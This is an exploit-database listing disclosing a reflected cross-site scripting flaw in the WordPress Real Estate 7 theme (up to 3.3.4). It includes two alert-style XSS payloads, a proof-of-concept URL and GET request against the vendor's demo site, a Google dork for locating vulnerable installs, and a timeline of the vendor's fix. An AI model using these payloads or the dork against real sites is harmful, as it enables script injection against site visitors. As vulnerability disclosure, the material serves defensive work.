Exploit for WordPress Real Estate 7 Theme 3.3.4 Cross Site Scripting Vulnerability

## https://sploitus.com/exploit?id=1337DAY-ID-38239
==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2023 ] ==

Report Title:        WordPress Real Estate 7 Theme <= 3.3.4 - Unauthenticated Reflected Cross-Site Scripting (XSS)
Google Dork:         inurl:/wp-content/themes/realestate-7/
Research Date:       2023-02-10
Researcher:          FearZzZz [ https://fearzzzz.ru ]
Component Vendor:    Contempo Themes [ https://contempothemes.com ]
Vulnerable Version:  <= 3.3.4
Component Link:      https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
CVSS Base Score:     6.1 (Medium)
CVSS Vector String:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
OWASP Top 10:        A7: Cross-Site Scripting (XSS)
CWE:                 CWE-79
CVE:                 TBA

=================================================================================================

#### [ Description: ]

The Real Estate 7 premium theme for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) attack vector in versions up to, and including, v3.3.4 via the 'ct_additional_features' option due to insufficient input sanitization and output escaping. This vulnerability allows unauthenticated attackers to inject malicious JavaScript payload in the search page that execute if they can trick a user into performing an action such as clicking on a link.



#### [ Impact: ]

Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.



#### [ Payloads: ]

```
<img src=x onerror=(alert)(`FearZzZz`);>
```


```
<svg/onload=alert(`FearZzZz`)>
```



#### [ Proof-of-Concept: ]

https://elementor3.contempothemes.com/?ct_mobile_keyword&ct_keyword=Z&ct_zipcode&search-listings=true&ct_additional_features%5B0%5D=central-forced-air%3Csvg%2Fonload%3Dalert%28%60FearZzZz%60%29%3E


GET /?ct_mobile_keyword&ct_keyword=Z&ct_zipcode&search-listings=true&ct_additional_features%5B0%5D=central-forced-air%3Csvg%2Fonload%3Dalert%28%60FearZzZz%60%29%3E HTTP/2
Host: elementor3.contempothemes.com



#### [ Timeline: ]

2023.02.08 - Real Estate 7 Theme v3.3.4 released.
2023.02.10 - Vulnerability has been discovered.
2023.02.13 - Vendor notified, received a quick response.
2023.02.13 - Real Estate 7 Theme v3.3.5 released, the vulnerability has been fixed.



#### [ Contacts: ]

Website:   fearzzzz.ru
Email:     [email protected]
Twitter:   https://twitter.com/fear_zzzz
Medium:    https://fearzzzz.medium.com
GitHub:    https://github.com/fearzzzz
YouTube:   https://youtube.com/@fearzzzz



#### [ Notes: ]

Special thanks to Chris Robinson (Contempo Themes Founder & CEO) for the quick response and for the respectful communication.